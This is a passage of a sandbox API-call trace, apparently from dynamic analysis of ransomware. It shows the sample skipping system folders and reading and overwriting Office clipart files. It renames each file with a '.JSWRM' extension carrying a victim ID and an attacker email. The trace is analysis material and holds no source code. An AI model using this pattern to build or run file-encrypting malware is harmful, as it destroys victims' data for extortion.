[0093.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0093.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0093.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0093.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0093.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0093.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0093.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0093.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0093.026] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00898_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00898_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00898_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00898_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0093.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0093.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0093.027] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10149fbd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10149fbd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10170232, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3100, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE00934_.WMF", cAlternateFileName="")) returned 1 [0093.027] lstrcmpiW (lpString1="PE00934_.WMF", lpString2=".") returned 1 [0093.027] lstrcmpiW (lpString1="PE00934_.WMF", lpString2="..") returned 1 [0093.027] lstrcmpiW (lpString1="PE00934_.WMF", lpString2="...") returned 1 [0093.027] lstrcmpiW (lpString1="PE00934_.WMF", lpString2="windows") returned -1 [0093.027] lstrcmpiW (lpString1="PE00934_.WMF", lpString2="recovery") returned -1 [0093.027] lstrcmpiW (lpString1="PE00934_.WMF", lpString2="perflogs") returned -1 [0093.027] lstrcmpiW (lpString1="PE00934_.WMF", lpString2="documents and settings") returned 1 [0093.027] lstrcmpiW (lpString1="PE00934_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.027] lstrcmpiW (lpString1="PE00934_.WMF", lpString2="system volume information") returned -1 [0093.027] lstrcmpiW (lpString1="PE00934_.WMF", lpString2="msocache") returned 1 [0093.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0093.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00934_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00934_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00934_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0093.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0093.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00934_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00934_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00934_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0093.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0093.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0093.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0093.028] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00934_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00934_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.028] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12544) returned 1 [0093.028] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3100) returned 0x24d210 [0093.029] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3100, lpOverlapped=0x0) returned 1 [0093.031] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.031] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3100, lpOverlapped=0x0) returned 1 [0093.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0093.032] CloseHandle (hObject=0x314) returned 1 [0093.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0093.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0093.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0093.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0093.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0093.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0093.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0093.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0093.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0093.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0093.032] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00934_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00934_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00934_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00934_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0093.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0093.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0093.033] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10149fbd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10149fbd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10149fbd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2904, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE00998_.WMF", cAlternateFileName="")) returned 1 [0093.033] lstrcmpiW (lpString1="PE00998_.WMF", lpString2=".") returned 1 [0093.033] lstrcmpiW (lpString1="PE00998_.WMF", lpString2="..") returned 1 [0093.033] lstrcmpiW (lpString1="PE00998_.WMF", lpString2="...") returned 1 [0093.033] lstrcmpiW (lpString1="PE00998_.WMF", lpString2="windows") returned -1 [0093.033] lstrcmpiW (lpString1="PE00998_.WMF", lpString2="recovery") returned -1 [0093.033] lstrcmpiW (lpString1="PE00998_.WMF", lpString2="perflogs") returned -1 [0093.033] lstrcmpiW (lpString1="PE00998_.WMF", lpString2="documents and settings") returned 1 [0093.033] lstrcmpiW (lpString1="PE00998_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.033] lstrcmpiW (lpString1="PE00998_.WMF", lpString2="system volume information") returned -1 [0093.033] lstrcmpiW (lpString1="PE00998_.WMF", lpString2="msocache") returned 1 [0093.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0093.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00998_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00998_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00998_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0093.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0093.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00998_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00998_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00998_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0093.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0093.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0093.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0093.034] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00998_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00998_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.034] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10500) returned 1 [0093.034] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2900) returned 0x24d210 [0093.034] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2900, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2900, lpOverlapped=0x0) returned 1 [0093.037] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.037] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2900, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2900, lpOverlapped=0x0) returned 1 [0093.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0093.037] CloseHandle (hObject=0x314) returned 1 [0093.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0093.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0093.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0093.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0093.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0093.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0093.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0093.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0093.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0093.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0093.037] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00998_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00998_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00998_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00998_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0093.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0093.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0093.038] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10149fbd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10149fbd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10149fbd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x984, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE01160_.WMF", cAlternateFileName="")) returned 1 [0093.038] lstrcmpiW (lpString1="PE01160_.WMF", lpString2=".") returned 1 [0093.038] lstrcmpiW (lpString1="PE01160_.WMF", lpString2="..") returned 1 [0093.038] lstrcmpiW (lpString1="PE01160_.WMF", lpString2="...") returned 1 [0093.038] lstrcmpiW (lpString1="PE01160_.WMF", lpString2="windows") returned -1 [0093.038] lstrcmpiW (lpString1="PE01160_.WMF", lpString2="recovery") returned -1 [0093.038] lstrcmpiW (lpString1="PE01160_.WMF", lpString2="perflogs") returned -1 [0093.038] lstrcmpiW (lpString1="PE01160_.WMF", lpString2="documents and settings") returned 1 [0093.038] lstrcmpiW (lpString1="PE01160_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.038] lstrcmpiW (lpString1="PE01160_.WMF", lpString2="system volume information") returned -1 [0093.039] lstrcmpiW (lpString1="PE01160_.WMF", lpString2="msocache") returned 1 [0093.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0093.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE01160_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE01160_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE01160_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0093.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0093.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE01160_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE01160_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE01160_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0093.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0093.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0093.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0093.039] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01160_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe01160_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.039] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2436) returned 1 [0093.039] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x980) returned 0x20c6c0 [0093.040] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x980, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x980, lpOverlapped=0x0) returned 1 [0093.041] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.041] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x980, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x980, lpOverlapped=0x0) returned 1 [0093.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0093.041] CloseHandle (hObject=0x314) returned 1 [0093.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0093.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0093.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0093.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0093.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0093.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0093.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0093.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0093.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0093.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0093.042] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01160_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe01160_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01160_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe01160_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0093.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0093.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0093.042] FindNextFileW (in: hFindFile=0x231b00, 